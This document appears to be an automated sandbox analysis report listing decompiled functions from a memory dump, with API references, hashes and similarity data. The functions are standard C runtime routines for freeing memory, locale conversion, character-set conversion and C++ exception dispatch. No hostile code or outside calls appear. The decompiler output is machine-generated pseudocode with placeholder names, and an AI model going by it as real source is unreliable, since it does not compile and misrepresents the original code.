0x004bd394
0x004bd4ee
0x004bd4f1
0x004bd4f6
0x004bd4f8
0x004bd4fd
0x004bd500
0x004bd505
0x004bd508
0x004bd50d
0x004bd510
0x004bd515
0x004bd47e
0x004bd484
0x004bd488
0x004bd48a
0x004bd48a
0x00000000
0x004bd488
0x004bd3a1
0x004bd3a4
0x004bd3a7
0x004bd3b0
0x004bd445
0x004bd448
0x004bd451
0x00000000
0x004bd45a
0x004bd3b6
0x004bd3b9
0x004bd3be
0x004bd3d2
0x004bd3e6
0x004bd3f2
0x004bd400
0x004bd41a
0x004bd436
0x004bd460
0x004bd473
0x004bd464
0x004bd468
0x004bd4db
0x00000000
0x00000000
0x004bd4dd
0x004bd4df
0x004bd4e2
0x004bd4e4
0x004bd4e7
0x004bd46e
0x004bd470
0x004bd472
0x004bd472
0x004bd472
0x004bd468
0x004bd478
0x004bd47b
0x00000000
0x004bd47b
0x004bd43b
0x004bd440
0x00000000
0x004bd444
0x004bd37e
0x00000000
0x004bd386
0x00000000
0x004bd327
0x004bd327
0x004bd329
0x004bd32c
0x004bd48c
0x004bd48c
0x004bd494
0x004bd496
0x004bd496
0x004bd49e
0x004bd4a3
0x004bd4a7
0x004bd4ac
0x004bd4b7
0x004bd4bd
0x004bd4a7
0x004bd4c1
0x004bd4c6
0x004bd4cc
0x00000000
0x004bd4cc

APIs

_free.LIBCMT ref: 004BD370
_free.LIBCMT ref: 004BD37E
_free.LIBCMT ref: 004BD4AC
_free.LIBCMT ref: 004BD4B7

Strings

@N, xrefs: 004BD500
@N, xrefs: 004BD4F8
DN, xrefs: 004BD510

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free
String ID: @N$@N$DN
API String ID: 269201875-95471587
Opcode ID: b5a9e389aa254042dce70f216a2f32f77fbb28ed1f8b5cd2830eb09921ce6248
Instruction ID: 620b9ed788cc5ef679bbbdde6e78add46e834bae98315cdb043e8cb399df271f
Opcode Fuzzy Hash: b5a9e389aa254042dce70f216a2f32f77fbb28ed1f8b5cd2830eb09921ce6248
Instruction Fuzzy Hash: 6F61D371D00205AFDB20DF65C842BEABBF4EF44310F1441ABE954EB342E774AD419BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00492A32, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00492A32(intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t32;
				intOrPtr _t37;
				intOrPtr _t42;
				intOrPtr _t49;
				intOrPtr _t50;
				signed int _t51;
				signed int _t56;
				void* _t66;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;

				_t50 = __ecx;
				_push(0x64);
				E0049D93F(0x4d6dcb, __edi, __esi);
				_t49 = _t50;
				 *((intOrPtr*)(_t68 - 0x6c)) = E004A5AB9();
				_t32 = E00489787(_t68 - 0x68);
				_t51 = 0xb;
				_t66 = _t32;
				 *((intOrPtr*)(_t68 - 0x70)) = _t49;
				memcpy(_t68 - 0x3c, _t66, _t51 << 2);
				_t70 = _t69 + 0xc;
				_t62 = _t66 + _t51 + _t51;
				_t67 = 0;
				 *((intOrPtr*)(_t49 + 8)) = 0;
				 *((intOrPtr*)(_t49 + 0x10)) = 0;
				 *((intOrPtr*)(_t49 + 0x14)) = 0;
				 *((intOrPtr*)(_t68 - 4)) = 0;
				E00489787(_t68 - 0x68);
				_t76 =  *((char*)(_t68 + 0xc));
				if( *((char*)(_t68 + 0xc)) == 0) {
					_t37 =  *((intOrPtr*)( *((intOrPtr*)(_t68 - 0x6c)) + 8));
				} else {
					_t37 = 0x40f063;
				}
				_push(_t68 - 0x68);
				_push(_t67);
				 *((intOrPtr*)(_t49 + 8)) = E004302EE(_t62, _t67, _t68, _t76, _t37);
				 *((intOrPtr*)(_t49 + 0x10)) = E0048BD4A(_t49, _t62, _t67, "false", _t67, _t68 - 0x3c);
				_t42 = E0048BD4A(_t49, _t62, _t67, "true", _t67, _t68 - 0x3c);
				_t71 = _t70 + 0x24;
				 *((intOrPtr*)(_t49 + 0x14)) = _t42;
				if( *((char*)(_t68 + 0xc)) == 0) {
					_t67 = _t68 - 0x3c;
					_t56 = 0xb;
					_push( *((intOrPtr*)(_t68 - 0x6c)));
					memcpy(_t71 - 0x2c, _t67, _t56 << 2);
					_t62 = _t67 + _t56 + _t56;
					_push(0);
					_t44 = E0048BB7A(_t49, _t49, _t67 + _t56 + _t56, _t67, __eflags);
				} else {
					 *((short*)(_t49 + 0xc)) = E0048BD19(0x2e, _t67, _t68 - 0x3c);
					 *((short*)(_t49 + 0xe)) = E0048BD19(0x2c, _t67, _t68 - 0x3c);
				}
				return E0049D8E9(_t44, _t62, _t67);
			}

0x00492a32
0x00492a32
0x00492a39
0x00492a3e
0x00492a45
0x00492a4c
0x00492a53
0x00492a54
0x00492a56
0x00492a5c
0x00492a5c
0x00492a5c
0x00492a5e
0x00492a60
0x00492a63
0x00492a66
0x00492a6c
0x00492a70
0x00492a75
0x00492a7b
0x00492a87
0x00492a7d
0x00492a7d
0x00492a7d
0x00492a8d
0x00492a8e
0x00492a95
0x00492aa7
0x00492ab4
0x00492ab9
0x00492abc
0x00492ac3
0x00492aed
0x00492af2
0x00492af5
0x00492af8
0x00492af8
0x00492afa
0x00492afe
0x00492ac5
0x00492ad1
0x00492ae4
0x00492ae4
0x00492b08

APIs

__EH_prolog3_GS.LIBCMT ref: 00492A39
__Getcvt.LIBCPMT ref: 00492A4C
__Getcvt.LIBCPMT ref: 00492A70
_Maklocstr.LIBCPMT ref: 00492AA2
_Maklocstr.LIBCPMT ref: 00492AB4
_Maklocchr.LIBCPMT ref: 00492ACC
_Maklocchr.LIBCPMT ref: 00492ADC
_Getvals.LIBCPMT ref: 00492AFE

Part of subcall function 0048BB7A: _Maklocchr.LIBCPMT ref: 0048BBA9
Part of subcall function 0048BB7A: _Maklocchr.LIBCPMT ref: 0048BBBF

Strings

false, xrefs: 00492A9D
true, xrefs: 00492AAF

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Maklocchr$GetcvtMaklocstr$GetvalsH_prolog3_
String ID: false$true
API String ID: 2593140031-2658103896
Opcode ID: 3a7fc022c5908b3a3711decbf9fa2cd462dc7f7bf9842744f36ce5334d36f6e5
Instruction ID: 31ba32b91284d4dbf03300cb929e666aaf157df395ef2d33d70c23c77514e452
Opcode Fuzzy Hash: 3a7fc022c5908b3a3711decbf9fa2cd462dc7f7bf9842744f36ce5334d36f6e5
Instruction Fuzzy Hash: 27216771D00204BEDF14FFA1D845A9F7BA8EF04714F14842BB9059F242D7789544CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004ACD9D, Relevance: 16.6, APIs: 11, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004ACD9D(void* __eflags, char* _a4, int _a8, char* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				char* _t31;
				int _t35;
				int _t43;
				int _t51;
				int _t53;
				void* _t55;
				void* _t61;
				short* _t62;
				short* _t65;

				E004A3439( &_v28, _a24);
				_t51 = 0;
				_t53 =  *(_v24 + 0x14);
				_t31 = _a4;
				_v8 = _t53;
				if(_t31 == 0) {
					L4:
					 *((intOrPtr*)(E004A966E())) = 0x16;
					E004A5E77();
					L18:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return _t51;
				}
				_t64 = _a8;
				if(_a8 == 0) {
					goto L4;
				}
				 *_t31 = 0;
				if(_a12 == 0 || _a16 == 0) {
					goto L4;
				} else {
					_t35 = MultiByteToWideChar(_t53, 0, _a12, 0xffffffff, 0, 0);
					_v12 = _t35;
					if(_t35 != 0) {
						_t62 = E004B3009(_t53, _t35 + _t35);
						_t55 = _t61;
						if(_t62 != 0) {
							if(MultiByteToWideChar(_v8, 0, _a12, 0xffffffff, _t62, _v12) != 0) {
								_t65 = E004B3009(_t55, _t64 + _t64);
								if(_t65 != 0) {
									_t43 = E004B0711(_t65, _a8, _t62, _a16, _a20, _a24);
									_v12 = _t43;
									if(_t43 != 0) {
										if(WideCharToMultiByte(_v8, 0, _t65, 0xffffffff, _a4, _a8, 0, 0) != 0) {
											_t51 = _v12;
										} else {
											E004A9638(GetLastError());
										}
									}
								}
								E004B2FCF(_t65);
							} else {
								E004A9638(GetLastError());
							}
						}
						E004B2FCF(_t62);
					} else {
						E004A9638(GetLastError());
					}
					goto L18;
				}
			}

0x004acdad
0x004acdb5
0x004acdb7
0x004acdba
0x004acdbd
0x004acdc2
0x004acdd7
0x004acddc
0x004acde2
0x004aceb4
0x004aceb8
0x004acebd
0x004acebd
0x004acecb
0x004acecb
0x004acdc4
0x004acdc9
0x00000000
0x00000000
0x004acdcb
0x004acdd0
0x00000000
0x004acdec
0x004acdf5
0x004acdfb
0x004ace00
0x004ace1d
0x004ace1f
0x004ace22
0x004ace3d
0x004ace56
0x004ace5b
0x004ace6b
0x004ace73
0x004ace78
0x004ace91
0x004acea2
0x004ace93
0x004ace9a
0x004ace9f
0x004ace91
0x004ace78
0x004acea6
0x004ace3f
0x004ace46
0x004ace46
0x004aceab
0x004acead
0x004ace02
0x004ace09
0x004ace0e
0x00000000
0x004ace00

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000,?), ref: 004ACDF5
GetLastError.KERNEL32 ref: 004ACE02
__dosmaperr.LIBCMT ref: 004ACE09
MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,?), ref: 004ACE35
GetLastError.KERNEL32 ref: 004ACE3F
__dosmaperr.LIBCMT ref: 004ACE46
WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,?,00000000,00000000), ref: 004ACE89
GetLastError.KERNEL32 ref: 004ACE93
__dosmaperr.LIBCMT ref: 004ACE9A
_free.LIBCMT ref: 004ACEA6
_free.LIBCMT ref: 004ACEAD

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
String ID:
API String ID: 2441525078-0
Opcode ID: a5d9d9b3fafa77f5840adda4f11a551e84a5c9b1e7baef7c2983b9ee995455f2
Instruction ID: f39add106dbc1116281e3f0bc68ec0e706161369b66cd82ea2aadc2fc5e9eb24
Opcode Fuzzy Hash: a5d9d9b3fafa77f5840adda4f11a551e84a5c9b1e7baef7c2983b9ee995455f2
Instruction Fuzzy Hash: 8531B17280110ABFDF11AFA5DC85DFF3B68AF56325B10012AF91096291DB398D11DB69

Uniqueness

Uniqueness Score: -1.00%

Function 004A171D, Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 308
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E004A171D(signed int __ecx, signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, char _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed int _v52;
				signed int* _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				void* _v72;
				char _v88;
				intOrPtr _v92;
				signed int _v96;
				intOrPtr _v104;
				void _v108;
				intOrPtr* _v116;
				signed char* _v188;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t203;
				void* _t204;
				char _t206;
				signed int _t208;
				signed int _t210;
				signed char* _t211;
				signed int _t212;
				signed int _t213;
				signed int _t217;
				void* _t220;
				signed char* _t223;
				void* _t226;
				void* _t227;
				signed int _t232;
				void* _t234;
				signed int _t235;
				void* _t238;
				intOrPtr* _t253;
				void* _t256;
				signed int* _t258;
				signed int _t259;
				intOrPtr _t260;
				signed int _t261;
				void* _t266;
				void* _t268;
				void* _t271;
				signed char* _t275;
				intOrPtr* _t276;
				signed char _t277;
				signed int _t278;
				signed int _t279;
				intOrPtr* _t281;
				signed int _t282;
				signed int _t283;
				signed int _t288;
				signed int _t295;
				signed int _t296;
				intOrPtr _t299;
				signed int _t305;
				signed char* _t306;
				signed int _t307;
				signed int _t308;
				signed int* _t310;
				signed char* _t313;
				signed int _t323;
				signed int _t324;
				signed int _t326;
				signed int _t335;
				void* _t337;
				void* _t339;
				void* _t340;
				void* _t341;
				void* _t342;

				_t305 = __edx;
				_t280 = __ecx;
				_push(_t324);
				_t310 = _a20;
				_v32 = 0;
				_v5 = 0;
				_t203 = E004A26AA(_a8, _a16, _t310);
				_t340 = _t339 + 0xc;
				_v16 = _t203;
				if(_t203 < 0xffffffff || _t203 >= _t310[1]) {
					L69:
					_t204 = L004AEA83(_t275, _t305, _t310, _t324);
					asm("int3");
					_t337 = _t340;
					_t341 = _t340 - 0x38;
					_push(_t275);
					_t276 = _v116;
					__eflags =  *_t276 - 0x80000003;
					if(__eflags == 0) {
						return _t204;
					} else {
						_push(_t324);
						_push(_t310);
						__eflags =  *(E004A13A1(_t276, _t280, _t305, _t310, _t324, __eflags) + 8);
						if(__eflags != 0) {
							_t324 =  *0x4f01d0(0);
							_t226 = E004A13A1(_t276, _t280, _t305, 0, _t324, __eflags);
							__eflags =  *((intOrPtr*)(_t226 + 8)) - _t324;
							if( *((intOrPtr*)(_t226 + 8)) != _t324) {
								__eflags =  *_t276 - 0xe0434f4d;
								if( *_t276 != 0xe0434f4d) {
									__eflags =  *_t276 - 0xe0434352;
									if( *_t276 != 0xe0434352) {
										_t217 = L0049EC91(_t276, _a4, _a8, _a12, _a16, _a24, _a28);
										_t341 = _t341 + 0x1c;
										__eflags = _t217;
										if(_t217 != 0) {
											L86:
											return _t217;
										}
									}
								}
							}
						}
						_t206 = _a16;
						_v28 = _t206;
						_v24 = 0;
						__eflags =  *(_t206 + 0xc);
						if( *(_t206 + 0xc) > 0) {
							_push(_a24);
							L0049EBC3(_t276, _t280, 0, _t324,  &_v44,  &_v28, _a20, _a12, _t206);
							_t307 = _v40;
							_t342 = _t341 + 0x18;
							_t217 = _v44;
							_v20 = _t217;
							_v12 = _t307;
							__eflags = _t307 - _v32;
							if(_t307 >= _v32) {
								goto L86;
							}
							_t282 = _t307 * 0x14;
							__eflags = _t282;
							_v16 = _t282;
							do {
								_t283 = 5;
								_t220 = memcpy( &_v64,  *((intOrPtr*)( *_t217 + 0x10)) + _t282, _t283 << 2);
								_t342 = _t342 + 0xc;
								__eflags = _v64 - _t220;
								if(_v64 > _t220) {
									goto L85;
								}
								__eflags = _t220 - _v60;
								if(_t220 > _v60) {
									goto L85;
								}
								_t223 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t288 = _t223[4];
								__eflags = _t288;
								if(_t288 == 0) {
									L83:
									__eflags =  *_t223 & 0x00000040;
									if(( *_t223 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E004A169D(_t307, _t276, _a4, _a8, _a12, _a16, _t223, 0,  &_v64, _a24, _a28);
										_t307 = _v12;
										_t342 = _t342 + 0x30;
									}
									goto L85;
								}
								__eflags =  *((char*)(_t288 + 8));
								if( *((char*)(_t288 + 8)) != 0) {
									goto L85;
								}
								goto L83;
								L85:
								_t307 = _t307 + 1;
								_t217 = _v20;
								_t282 = _v16 + 0x14;
								_v12 = _t307;
								_v16 = _t282;
								__eflags = _t307 - _v32;
							} while (_t307 < _v32);
							goto L86;
						}
						L004AEA83(_t276, _t305, 0, _t324);
						asm("int3");
						_push(_t337);
						_t306 = _v188;
						_push(_t276);
						_push(_t324);
						_push(0);
						_t208 = _t306[4];
						__eflags = _t208;
						if(_t208 == 0) {
							L111:
							_t210 = 1;
							__eflags = 1;
						} else {
							_t281 = _t208 + 8;
							__eflags =  *_t281;
							if( *_t281 == 0) {
								goto L111;
							} else {
								__eflags =  *_t306 & 0x00000080;
								_t313 = _v0;
								if(( *_t306 & 0x00000080) == 0) {
									L93:
									_t277 = _t313[4];
									_t326 = 0;
									__eflags = _t208 - _t277;
									if(_t208 == _t277) {
										L103:
										__eflags =  *_t313 & 0x00000002;
										if(( *_t313 & 0x00000002) == 0) {
											L105:
											_t211 = _a4;
											__eflags =  *_t211 & 0x00000001;
											if(( *_t211 & 0x00000001) == 0) {
												L107:
												__eflags =  *_t211 & 0x00000002;
												if(( *_t211 & 0x00000002) == 0) {
													L109:
													_t326 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t306 & 0x00000002;
													if(( *_t306 & 0x00000002) != 0) {
														goto L109;
													}
												}
											} else {
												__eflags =  *_t306 & 0x00000001;
												if(( *_t306 & 0x00000001) != 0) {
													goto L107;
												}
											}
										} else {
											__eflags =  *_t306 & 0x00000008;
											if(( *_t306 & 0x00000008) != 0) {
												goto L105;
											}
										}
										_t210 = _t326;
									} else {
										_t212 = _t277 + 8;
										while(1) {
											_t278 =  *_t281;
											__eflags = _t278 -  *_t212;
											if(_t278 !=  *_t212) {
												break;
											}
											__eflags = _t278;
											if(_t278 == 0) {
												L99:
												_t213 = _t326;
											} else {
												_t279 =  *((intOrPtr*)(_t281 + 1));
												__eflags = _t279 -  *((intOrPtr*)(_t212 + 1));
												if(_t279 !=  *((intOrPtr*)(_t212 + 1))) {
													break;
												} else {
													_t281 = _t281 + 2;
													_t212 = _t212 + 2;
													__eflags = _t279;
													if(_t279 != 0) {
														continue;
													} else {
														goto L99;
													}
												}
											}
											L101:
											__eflags = _t213;
											if(_t213 == 0) {
												goto L103;
											} else {
												_t210 = 0;
											}
											goto L112;
										}
										asm("sbb eax, eax");
										_t213 = _t212 | 0x00000001;
										__eflags = _t213;
										goto L101;
									}
								} else {
									__eflags =  *_t313 & 0x00000010;
									if(( *_t313 & 0x00000010) != 0) {
										goto L111;
									} else {
										goto L93;
									}
								}
							}
						}
						L112:
						return _t210;
					}
				} else {
					_t275 = _a4;
					if( *_t275 != 0xe06d7363 || _t275[0x10] != 3 || _t275[0x14] != 0x19930520 && _t275[0x14] != 0x19930521 && _t275[0x14] != 0x19930522) {
						_t324 = 0;
						__eflags = 0;
						goto L24;
					} else {
						_t324 = 0;
						_t350 = _t275[0x1c];
						if(_t275[0x1c] != 0) {
							L24:
							_t280 = _a12;
							_v12 = _t280;
							goto L26;
						} else {
							_t227 = E004A13A1(_t275, _t280, _t305, _t310, 0, _t350);
							_t351 =  *((intOrPtr*)(_t227 + 0x10));
							if( *((intOrPtr*)(_t227 + 0x10)) == 0) {
								L63:
								return _t227;
							} else {
								_t275 =  *(E004A13A1(_t275, _t280, _t305, _t310, 0, _t351) + 0x10);
								_t266 = E004A13A1(_t275, _t280, _t305, _t310, 0, _t351);
								_v32 = 1;
								_v12 =  *((intOrPtr*)(_t266 + 0x14));
								if(_t275 == 0) {
									goto L69;
								} else {
									if( *_t275 != 0xe06d7363 || _t275[0x10] != 3 || _t275[0x14] != 0x19930520 && _t275[0x14] != 0x19930521 && _t275[0x14] != 0x19930522) {
										L16:
										_t268 = E004A13A1(_t275, _t280, _t305, _t310, _t324, _t358);
										_t359 =  *((intOrPtr*)(_t268 + 0x1c)) - _t324;
										if( *((intOrPtr*)(_t268 + 0x1c)) == _t324) {
											L25:
											_t280 = _v12;
											_t203 = _v16;
											L26:
											_v56 = _t310;
											_v52 = _t324;
											__eflags =  *_t275 - 0xe06d7363;
											if( *_t275 != 0xe06d7363) {
												L59:
												__eflags = _t310[3] - _t324;
												if(__eflags <= 0) {
													goto L62;
												} else {
													__eflags = _a24;
													if(__eflags != 0) {
														goto L69;
													} else {
														_push(_a32);
														_push(_a28);
														_push(_t203);
														_push(_t310);
														_push(_a16);
														_push(_t280);
														_push(_a8);
														_push(_t275);
														L70();
														_t340 = _t340 + 0x20;
														goto L62;
													}
												}
											} else {
												__eflags = _t275[0x10] - 3;
												if(_t275[0x10] != 3) {
													goto L59;
												} else {
													__eflags = _t275[0x14] - 0x19930520;
													if(_t275[0x14] == 0x19930520) {
														L31:
														__eflags = _t310[3] - _t324;
														if(_t310[3] > _t324) {
															_push(_a28);
															L0049EBC3(_t275, _t280, _t310, _t324,  &_v72,  &_v56, _t203, _a16, _t310);
															_t305 = _v68;
															_t340 = _t340 + 0x18;
															_t253 = _v72;
															_v48 = _t253;
															_v20 = _t305;
															__eflags = _t305 - _v60;
															if(_t305 < _v60) {
																_t295 = _t305 * 0x14;
																__eflags = _t295;
																_v36 = _t295;
																do {
																	_t296 = 5;
																	_t256 = memcpy( &_v108,  *((intOrPtr*)( *_t253 + 0x10)) + _t295, _t296 << 2);
																	_t340 = _t340 + 0xc;
																	__eflags = _v108 - _t256;
																	if(_v108 <= _t256) {
																		__eflags = _t256 - _v104;
																		if(_t256 <= _v104) {
																			_t299 = 0;
																			_v24 = 0;
																			__eflags = _v96;
																			if(_v96 != 0) {
																				_t258 =  *(_t275[0x1c] + 0xc);
																				_t308 =  *_t258;
																				_t259 =  &(_t258[1]);
																				__eflags = _t259;
																				_v40 = _t259;
																				_t260 = _v92;
																				_v44 = _t308;
																				_v28 = _t260;
																				do {
																					asm("movsd");
																					asm("movsd");
																					asm("movsd");
																					asm("movsd");
																					_t323 = _v40;
																					_t335 = _t308;
																					__eflags = _t335;
																					if(_t335 <= 0) {
																						goto L42;
																					} else {
																						while(1) {
																							_push(_t275[0x1c]);
																							_t261 =  &_v88;
																							_push( *_t323);
																							_push(_t261);
																							L89();
																							_t340 = _t340 + 0xc;
																							__eflags = _t261;
																							if(_t261 != 0) {
																								break;
																							}
																							_t335 = _t335 - 1;
																							_t323 = _t323 + 4;
																							__eflags = _t335;
																							if(_t335 > 0) {
																								continue;
																							} else {
																								_t299 = _v24;
																								_t260 = _v28;
																								_t308 = _v44;
																								goto L42;
																							}
																							goto L45;
																						}
																						_push(_a24);
																						_v5 = 1;
																						_push(_v32);
																						E004A169D(_t308, _t275, _a8, _v12, _a16, _a20,  &_v88,  *_t323,  &_v108, _a28, _a32);
																						_t340 = _t340 + 0x30;
																					}
																					L45:
																					_t305 = _v20;
																					goto L46;
																					L42:
																					_t299 = _t299 + 1;
																					_t260 = _t260 + 0x10;
																					_v24 = _t299;
																					_v28 = _t260;
																					__eflags = _t299 - _v96;
																				} while (_t299 != _v96);
																				goto L45;
																			}
																		}
																	}
																	L46:
																	_t305 = _t305 + 1;
																	_t253 = _v48;
																	_t295 = _v36 + 0x14;
																	_v20 = _t305;
																	_v36 = _t295;
																	__eflags = _t305 - _v60;
																} while (_t305 < _v60);
																_t310 = _a20;
																_t324 = 0;
																__eflags = 0;
															}
														}
														__eflags = _a24;
														if(_a24 != 0) {
															_push(1);
															E004A1196();
															_t280 = _t275;
														}
														__eflags = _v5;
														if(__eflags != 0) {
															L62:
															_t227 = E004A13A1(_t275, _t280, _t305, _t310, _t324, __eflags);
															__eflags =  *((intOrPtr*)(_t227 + 0x1c)) - _t324;
															if( *((intOrPtr*)(_t227 + 0x1c)) != _t324) {
																goto L69;
															} else {
																goto L63;
															}
														} else {
															__eflags = ( *_t310 & 0x1fffffff) - 0x19930521;
															if(__eflags < 0) {
																goto L62;
															} else {
																__eflags = _t310[7];
																if(_t310[7] != 0) {
																	L55:
																	__eflags = _t310[8] >> 0x00000002 & 0x00000001;
																	if(__eflags == 0) {
																		_push(_t310[7]);
																		_t232 = E004A2114(_t275, _t310, _t324, _t275);
																		_pop(_t280);
																		__eflags = _t232;
																		if(__eflags == 0) {
																			goto L66;
																		} else {
																			goto L62;
																		}
																	} else {
																		 *(E004A13A1(_t275, _t280, _t305, _t310, _t324, __eflags) + 0x10) = _t275;
																		 *((intOrPtr*)(E004A13A1(_t275, _t280, _t305, _t310, _t324, __eflags) + 0x14)) = _v12;
																		goto L64;
																	}
																} else {
																	__eflags = _t310[8] >> 0x00000002 & 0x00000001;
																	if(__eflags == 0) {
																		goto L62;
																	} else {
																		__eflags = _a28;
																		if(__eflags != 0) {
																			goto L62;
																		} else {
																			goto L55;
																		}
																	}
																}
															}
														}
													} else {
														__eflags = _t275[0x14] - 0x19930521;
														if(_t275[0x14] == 0x19930521) {
															goto L31;
														} else {
															__eflags = _t275[0x14] - 0x19930522;
															if(_t275[0x14] != 0x19930522) {
																goto L59;
															} else {
																goto L31;
															}
														}
													}
												}
											}
										} else {
											_v20 =  *((intOrPtr*)(E004A13A1(_t275, _t280, _t305, _t310, _t324, _t359) + 0x1c));
											_t271 = E004A13A1(_t275, _t280, _t305, _t310, _t324, _t359);
											_push(_v20);
											 *(_t271 + 0x1c) = _t324;
											if(E004A2114(_t275, _t310, _t324, _t275) != 0) {
												goto L25;
											} else {
												_t310 = _v20;
												_t361 =  *_t310 - _t324;
												if( *_t310 <= _t324) {
													L64:
													L004A5A7D();
												} else {
													_t302 = _t324;
													_v20 = _t324;
													while(L0043CC09( *((intOrPtr*)(_t302 + _t310[1] + 4)), _t361, 0x4ec894) == 0) {
														_t324 = _t324 + 1;
														_t302 = _v20 + 0x10;
														_v20 = _v20 + 0x10;
														_t361 = _t324 -  *_t310;
														if(_t324 >=  *_t310) {
															goto L64;
														} else {
															continue;
														}
														goto L65;
													}
												}
												L65:
												_push(1);
												_push(_t275);
												E004A1196();
												_t280 =  &_v68;
												L004A1DB4( &_v68);
												E004A1116( &_v68, 0x4e86cc);
												L66:
												 *(E004A13A1(_t275, _t280, _t305, _t310, _t324, __eflags) + 0x10) = _t275;
												_t234 = E004A13A1(_t275, _t280, _t305, _t310, _t324, __eflags);
												_t280 = _v12;
												 *(_t234 + 0x14) = _v12;
												_t235 = _a32;
												__eflags = _t235;
												if(_t235 == 0) {
													_t235 = _a8;
												}
												L0049EDA7(_t280, _t235, _t275);
												E004A2014(_a8, _a16, _t310);
												_t238 = E004A21D1(_t310);
												_t340 = _t340 + 0x10;
												_push(_t238);
												L004A1F90(_t275, _t280, _t305, _t310, _t324, __eflags);
												goto L69;
											}
										}
									} else {
										_t358 = _t275[0x1c] - _t324;
										if(_t275[0x1c] == _t324) {
											goto L69;
										} else {
											goto L16;
										}
									}
								}
							}
						}
					}
				}
			}

0x004a171d
0x004a171d
0x004a1724
0x004a1726
0x004a172f
0x004a1735
0x004a1738
0x004a173d
0x004a1740
0x004a1746
0x004a1acd
0x004a1acd
0x004a1ad2
0x004a1ad4
0x004a1ad6
0x004a1ad9
0x004a1ada
0x004a1add
0x004a1ae3
0x004a1c02
0x004a1ae9
0x004a1ae9
0x004a1aea
0x004a1af2
0x004a1af5
0x004a1afe
0x004a1b00
0x004a1b05
0x004a1b08
0x004a1b0a
0x004a1b10
0x004a1b12
0x004a1b18
0x004a1b2d
0x004a1b32
0x004a1b35
0x004a1b37
0x004a1bfe
0x00000000
0x004a1bff
0x004a1b37
0x004a1b18
0x004a1b10
0x004a1b08
0x004a1b3d
0x004a1b40
0x004a1b43
0x004a1b46
0x004a1b49
0x004a1b4f
0x004a1b61
0x004a1b66
0x004a1b69
0x004a1b6c
0x004a1b6f
0x004a1b72
0x004a1b75
0x004a1b78
0x00000000
0x00000000
0x004a1b7e
0x004a1b7e
0x004a1b81
0x004a1b84
0x004a1b93
0x004a1b94
0x004a1b94
0x004a1b96
0x004a1b99
0x00000000
0x00000000
0x004a1b9b
0x004a1b9e
0x00000000
0x00000000
0x004a1bac
0x004a1bae
0x004a1bb1
0x004a1bb3
0x004a1bbb
0x004a1bbb
0x004a1bbe
0x004a1bc0
0x004a1bc2
0x004a1bde
0x004a1be3
0x004a1be6
0x004a1be6
0x00000000
0x004a1bbe
0x004a1bb5
0x004a1bb9
0x00000000
0x00000000
0x00000000
0x004a1be9
0x004a1bec
0x004a1bed
0x004a1bf0
0x004a1bf3
0x004a1bf6
0x004a1bf9
0x004a1bf9
0x00000000
0x004a1b84
0x004a1c03
0x004a1c08
0x004a1c09
0x004a1c0c
0x004a1c0f
0x004a1c10
0x004a1c11
0x004a1c12
0x004a1c15
0x004a1c17
0x004a1c8f
0x004a1c91
0x004a1c91
0x004a1c19
0x004a1c19
0x004a1c1c
0x004a1c1f
0x00000000
0x004a1c21
0x004a1c21
0x004a1c24
0x004a1c27
0x004a1c2e
0x004a1c2e
0x004a1c31
0x004a1c33
0x004a1c35
0x004a1c67
0x004a1c67
0x004a1c6a
0x004a1c71
0x004a1c71
0x004a1c74
0x004a1c77
0x004a1c7e
0x004a1c7e
0x004a1c81
0x004a1c88
0x004a1c8a
0x004a1c8a
0x004a1c83
0x004a1c83
0x004a1c86
0x00000000
0x00000000
0x004a1c86
0x004a1c79
0x004a1c79
0x004a1c7c
0x00000000
0x00000000
0x004a1c7c
0x004a1c6c
0x004a1c6c
0x004a1c6f
0x00000000
0x00000000
0x004a1c6f
0x004a1c8b
0x004a1c37
0x004a1c37
0x004a1c3a
0x004a1c3a
0x004a1c3c
0x004a1c3e
0x00000000
0x00000000
0x004a1c40
0x004a1c42
0x004a1c56
0x004a1c56
0x004a1c44
0x004a1c44
0x004a1c47
0x004a1c4a
0x00000000
0x004a1c4c
0x004a1c4c
0x004a1c4f
0x004a1c52
0x004a1c54
0x00000000
0x00000000
0x00000000
0x00000000
0x004a1c54
0x004a1c4a
0x004a1c5f
0x004a1c5f
0x004a1c61
0x00000000
0x004a1c63
0x004a1c63
0x004a1c63
0x00000000
0x004a1c61
0x004a1c5a
0x004a1c5c
